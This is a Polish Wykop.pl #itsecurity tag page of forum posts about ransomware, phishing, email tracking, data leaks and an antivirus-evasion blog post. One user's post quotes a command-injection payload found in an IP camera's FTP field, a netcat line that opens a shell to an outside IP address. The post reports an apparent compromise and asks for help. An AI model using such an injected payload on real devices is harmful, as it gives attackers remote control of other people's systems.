#itsecurity - strona 12

Wszystko

Wszystkie

Archiwum

konto usunięte 17.05.2020, 14:57:12

siema! na moim blogu pojawił się kolejny wpis, czyli:
Omijanie antywirusów w praktyce - przykład

zapraszam do czytania i ewentualnych komentarzy ( ͡° ͜ʖ ͡°)

#deicide #bezpieczenstwoit #itsecurity #programowanie #hacking

object

17.05.2020, 20:11:09

@glasn0st: to jak wykrywane są później wirusy? Na podstawie re? czy może jakiś ml?

g.....t

konto usunięte 17.05.2020, 20:35:04

@object: później to znaczy takie, które nie zostały wykryte w "pierwszej fazie"?
dla przykładu jak wrzucasz .exe na virustotal albo any.run często próbki są wysyłane do zespołów/ludzi analizujących je ręcznie, chodzi o to, że zwykły antywirus ma za mało czasu żeby dokładnie przyjrzeć się programowi ( ͡° ͜ʖ ͡°)

object

Omijanie antywirusów w praktyce - przykład

Jak omijać antywirusy i tworzyć złośliwy kod, który nie zostanie z góry usunięty z systemu? Przykładowa technika.

z dodany: 17.05.2020, 14:55:53

robekk1978

29.04.2020, 10:37:08

zajebista firma marketingowa jest zajebista
"w ubiegłym tygodniu" - ale dodać date publikacji artykułu to po co ... kretyni

https://www.fortum.pl/komunikat-do-klientow-fortum-marketing-and-sales-polska-sa

#itsecurity #bezpieczenstwo #rodo #uodo #internet

CinExPL

ptr55

26.04.2020, 14:41:28

Czy logowanie na Facebook/Instagram wewnątrz aplikacji (w tym wypadku #tinder) jest bezpieczne? Przecież taki formularz można spreparować, nie widzę tutaj możliwości sprawdzenia, że rzeczywiście Facebook obsługuje dane logowania.

#bezpieczenstwo #itsecurity

ptr55 - Czy logowanie na Facebook/Instagram wewnątrz aplikacji (w tym wypadku #tinder... — **źródło:** comment_1587912054sasKiAlLHTLMhyfTyOdTGS.jpg

Reretos

26.04.2020, 15:27:54

@ptr55: Wydaje mi się, że można posprawdzać debuggowanie appek androidowych.
Niestety teraz nie mogę sprawdzić, czy metoda w czymś ci pomoże (bo mam zepsuty port usb i nie dam rady użyć debbugowania za pomocą usb), ale możesz zajrzeć np. tu https://stackoverflow.com/questions/42306064/how-to-inspect-playstore-apps-installed-in-my-android-phone-on-google-chrome-bro

ptr55

srogie_ciasteczko

27.04.2020, 16:24:58 via Wykop Mobilny (Android)

@ptr55: nie jest w #!$%@? i nie wiem czemu w ogóle coś takiego dopuszczają

Kliko

22.04.2020, 21:19:58

Mirki, czy też czasami po wejściu na jakąś stronę z wyników wyszukiwania w Google wyskakuje wam taka spamerska strona? Bo nie jestem pewien, czy to ja mam jakiegoś wirusa, czy to wina tych stron. W guglu nie znalazłem żadnych informacji na ten temat, sam dość dbam o bezpieczeństwo (ostatni raz złapałem jakiegoś trojana chyba z 7 lat temu), programy typu antimalware nic nie znajdują, samo zjawisko również jest dość rzadkie jak na

Kliko - Mirki, czy też czasami po wejściu na jakąś stronę z wyników wyszukiwania w Go... — **źródło:** comment_1587590365O6s47jpluf5CdY4Sb9lfDq.jpg

Bpnn

22.04.2020, 21:31:24

@Kliko: u mnie ten link też przekierowuje na tę gówno stronkę. A żeby było ciekawiej to tylko w Firefoxie i tylko gdy nie jestem w trybie prywatnym. W Chromium i w trybie prywatnym w Firefoxie jest ok. (Linux btw.)

Kliko

webdruid

22.04.2020, 21:39:37

@Kliko: syf na stronie. Nie przekierowuje się całego ruchu bo wydłuża to żywotność zainfekowanej strony.

g.....t

konto usunięte 20.04.2020, 14:44:21

czołem wykopki, na swój blog, na którym ostatnio dodałem artykuł nt. hackowania wykopu ( ͡º ͜ʖ͡º) wpadł dziś nowy artykuł dotyczący śledzenia wiadomości e-mail, zainteresowanych zapraszam ( ͡° ͜ʖ ͡°)

Wykrywanie odczytania wiadomości e-mail + panel WWW

#it #itsecurity #programowanie #deicide

g.....t

konto usunięte 20.04.2020, 15:00:36

@sokytsinolop:

każdy

może z większych, ale jedyne co mi przychodzi do głowy to gmail, który i tak pobiera obrazek w momencie otwarcia maila

poza tym jak pisałem w znalezisku: zostaje cała masa innych providerów + ludzie używający maila na telefonach(dla przykładu klient poczty z iPhone automatycznie pobiera obrazki przy otwarciu wiadomości, sprawdzone)

sokytsinolop

sokytsinolop

20.04.2020, 15:01:58

@glasn0st: no to fajnie, tak się zastanawiałem bo przecież to prosta rzecz a w 100% zabezpieczy przed czymś takim i dziwiłem się ze tego nie robią ;) już nawet nie mówię o aplikacjach, ale o serwerach obsługujących konta emailowe

konto usunięte

Jak wykryć czy nasza wiadomość email została odczytana bez wiedzy odbiorcy?

Na moim blogu pojawił się nowy artykuł dot. wykrywania odczytania wiadomości e-mail bez wiedzy odbiorcy, dodatkowo dodałem przykładowy panel WWW ułatwiający cały proces.

z dodany: 20.04.2020, 14:42:26

Marcinnx

14.04.2020, 11:30:43

[nazwapliku].id[cyferki].[helprecover@foxmail.com].help

spotkał się już ktoś z takim cholerstwem? ( ͡° ʖ̯ ͡°)
wszystkie pliki zaszyfrowane w ten sposób...
żadnej innej wiadomości nie widziałem, ale z drugiej strony kompa jeszcze nie restartowałem (ʘ‿ʘ)

po szybkim ogarnięciu internetu wychodzi mi, że prawdopodobnie jest to

Phobos Ransomware

no i piszą ludziska, że jak dotąd nie ma ratunku...
ale może mireczki coś wiedzą? ʕ•ᴥ•ʔ

konto usunięte
gruss_di

l-_-l

14.04.2020, 11:38:22 via Wykop Mobilny (Android)

@Marcinnx: backup

konto usunięte
konto usunięte
piotrekkk2
CinExPL

Polankowicz

14.04.2020, 13:41:47

@Marcinnx: Popytaj pod tagiem #linux itp

CloudFlare porzuca reCAPTCHA od Google na rzecz hCaptcha

Formuła zadań pozostaje podobna. Lecz może to być wybawieniem dla internautów, których ustawienia prywatności powodowały wieczne flagowanie przez reCAPTCHA.

z dodany: 08.04.2020, 18:30:45

Paryskie szpitale celem nieudanego cyberataku [ENG]

Zespół szpitali AP-HP był celem nieudanego cyberataku dnia 22 marca - donosi francuska agencja cyberbezpieczeństwa. *** The Paris hospital authority, AP-HP, was the target of a cyber-attack on March 22, according to France’s cybersecurity agency.

z dodany: 26.03.2020, 15:00:44

nofluffjobs

12.03.2020, 12:38:32

Hej hej! Sprawdźcie najnowsze ogłoszenia z kategorii Project Manager, UX Designer, IT Support, Business Intelligence i Business Analyst:

PROJECT MANAGER JOBS

- [REMOTE] Project Manager @ netguru.co 6.5k-10.3k (B2B), 5.2k-8.3k (UoP)
- [REMOTE] Senior Project Manager @ netguru.co 11.1k-14.5k (B2B), 9.0k-11.7k (UoP)
- [REMOTE] Senior PMO-Talent Allocation Specialist @ netguru.com 8.1k-10.6k (B2B), 6.6k-8.6k (UoP)

- [WAW] Business Intelligence Project Manager @ talentica.pl 11.0k-13.5k (B2B), 10.0k-11.0k (UoP)
- [WAW] Technical Project Manager

NiedzielnyMirek

05.03.2020, 18:56:25

#cyberbezpieczenstwo #bezpieczenstwoit #itsecurity
Jaki program jest polecany do szyfrowania plików? Chodzi mi o zaszyfrowanie setek albo tysięcy plików ewentualnie mogą to być szyfrowane foldery. Idealny use case jest taki, że wybieram pliki/foldery do zaszyfrowania i wszystko jest szyfrowane inplace. Do wszystkich danych ma być ustawione to samo hasło, zapewne jakiś proces musiałby chodzić zawsze w tle i przy logowaniu pytać o hasło. Nie chodzi mi o kontenery, ani szyfrowanie dysku, zależy mi

05.03.2020, 20:20:02

@NiedzielnyMirek: http://linuxpoison.blogspot.com/2010/01/recursively-encrypt-decrypt-directories.html
+ skrypty odpalane przy logowaniu sie

NiedzielnyMirek

NiedzielnyMirek

06.03.2020, 06:18:06

@login-jest-zajety: dzięki. Przeczytam wieczorem. Zależy mi na wsparciu Windows i linuksa

bb-8

14.02.2020, 18:39:37

Wygląda legitnie, nie? ( ͡° ͜ʖ ͡°)
#itsecurity #bezpieczenstwo #facebook #chrome #niebezpiecznik #zaufanatrzeciastrona #sekurak

bb-8 - Wygląda legitnie, nie? ( ͡° ͜ʖ ͡°)
#itsecurity #bezpieczenstwo #facebook #chr... — **źródło:** comment_1581705548IEaL9pLTjaz7MQ8V4ACef7.jpg

ptaszyszko

zaxcer

09.02.2020, 18:38:30

W nocy z soboty na niedzielę włamano się do domu jednorodzinnego (nowo pobudowany dom) mojego znajomego. W domu nie było w tym czasie nikogo (nie jest to regularna sytuacja, impreza okolicznościowa), domownicy wrócili ok godziny 1 w nocy i PRAWDOPODOBNIE było już po wszystkim, znajomi jednak włamanie dostrzegli dopiero rano po śladach w kuchni (wyłamane okno, ślady butów na blacie). Okazało się, że z domu zginęła tylko spora kwota pieniędzy które schowane

Pawel993

09.02.2020, 18:51:23

@zaxcer: na niebezpieczniku był taki temat poruszany odnośnie hoteli, są specjalne urządzenia które spanują fragment ściany i pokazują cyz jest jakies urządzenie elektroniczne tam, ale troche drogi taki sprzęt jest

zaxcer

rajman

10.02.2020, 07:42:58 via Wykop Mobilny (Android)

@zaxcer: wołaj jak coś wyjaśnisz

tomasztomasz1234

29.01.2020, 11:03:10

-> Znalezisko <-

Dla zainteresowanych tematyką prywatności i ochrony danych: Amazon śledzi i zapisuje każde dotknięcie na kindle. Sprawę nagłośniła dziennikarka śledcza Adrianne Jeffries.

tomasztomasz1234 - -> Znalezisko <-

Dla zainteresowanych tematyką prywatności i oc... — **źródło:** comment_CwgM4EbWdTSVMFp929dMvDTEUBcRF9qw.jpg

MandarynWspanialy

29.01.2020, 11:14:06

Amazon śledzi i zapisuje każde dotknięcie na kindle

@tomasztomasz1234: z tego wynika, że #inkbooklepsze ( ͡~ ͜ʖ ͡°)

tomjar

08.01.2020, 21:24:18

##!$%@? #it #bezpieczenstwo #itsecurity #sieci
Co tu sie odjaniepawla? Mam kamerke ip time 2 surveillance i przed chwila sie zalogowalem z ciekawosci przez przegladarke - z tej samej sieci i bawie sie w konfiguracje itp, przechodze do zakladki ftp settings a tam takie cos jak na zalaczonym obrazku tzn "$(nc 220.132.29.16 10412 -e /bin/sh)"
dodam ze nigdy nic nie bylo w tym polu a juz kilka razy ta kamerke konfigurowalem. Ten ip

tomjar - ##!$%@? #it #bezpieczenstwo #itsecurity #sieci
Co tu sie odjaniepawla? Mam ... — **źródło:** comment_x5MguJ9phiuzAghVYuQXL7EKgC95x5yX.jpg

mmmmmmmmmmmmmm

08.01.2020, 21:25:43

@tomjar: tunel, ktos zapostuje cp z twojej kamerki i bedzie przewalone ;)

mmmmmmmmmmmmmm

08.01.2020, 21:41:40

@tomjar: a tego juz nie wiem ;) dobra wiadomosc jest taka ze ten ip i port mnie odrzuca

konto usunięte
tomjar

Prokurator z generalnej obawiając się wycieku swoich danych negocjucje?

Wyciek mógł dotknąć wielu prokuratorów, niektórzy podjęli kontakt z osobą która stoi za wyciekiem w obawie przed dalszymi publikacjami - zachowanie prokuratora Prokuratury Krajowej daje do myślenia, że jest się czego obawiać...

z dodany: 30.12.2019, 18:04:54

Dodaj Komentarz
#
polska
#
hacking
#
itsecurity
#
prokuratura
#
afera

AnonimoweMirkoWyznania

27.12.2019, 15:43:06

#anonimowemirkowyznania
#hacking #security #itsecurity #afera

W sumie nie chcę dodawać przez swoje konto, żeby nie było że mam coś z tym wspólnego, a sądzę że temat jest nadal gorący.

Kojarzycie ten wyciek dot. prokuratorów - ich prywatne dokumenty, zdjęcia? Chyba osoba która za tym stała idzie teraz na całego - nawiązałem z nią kontakt mailowy po tym jak dostała bana na poprzednim koncie TT i podała nowy link do TT.
Założyła nowe

Just666

27.12.2019, 21:05:00

@tfbeen: jak możesz zdradź coś więcej. Może być prv.

AnonimoweMirkoWyznania

28.12.2019, 11:04:25

Slali: O co xhodzi z ta afera ?

Zaakceptował: Eugeniusz_Zua

kleksiq

05.12.2019, 15:27:12

@niebezpiecznik-pl, @sekurak, @ZaufanaTrzeciaStrona

A był taki spokój ;) https://www.zdnet.com/article/ransomware-attack-hits-major-us-data-center-provider/

#ransomware #itsecurity #informatyka

ZaufanaTrzeciaStrona

05.12.2019, 19:47:30

Tak długo jak ktoś płaci tak długo będą ataki. Nie nadążamy z aktualizowaniem slajdów o tych atakach ;)

Bumbor

26.11.2019, 19:43:44

Cześć, przy próbie wejścia na stronę https://el.us.edu.pl/wmfich/ wywaliło mi komunikat jak poniżej (na Mozilli). Loginem na tej stronie jest PESEL, jaka jest szansa że dane zostaną skradzione? Jeśli duża to wypada mi ostrzec parę osób xD

PS. sam tam konta na szczęście nie mam

#it #itsecurity #polskieuczelnie

Bumbor

26.11.2019, 20:10:06

wołam @niebezpiecznik-pl bo zależy mi na odpowiedzi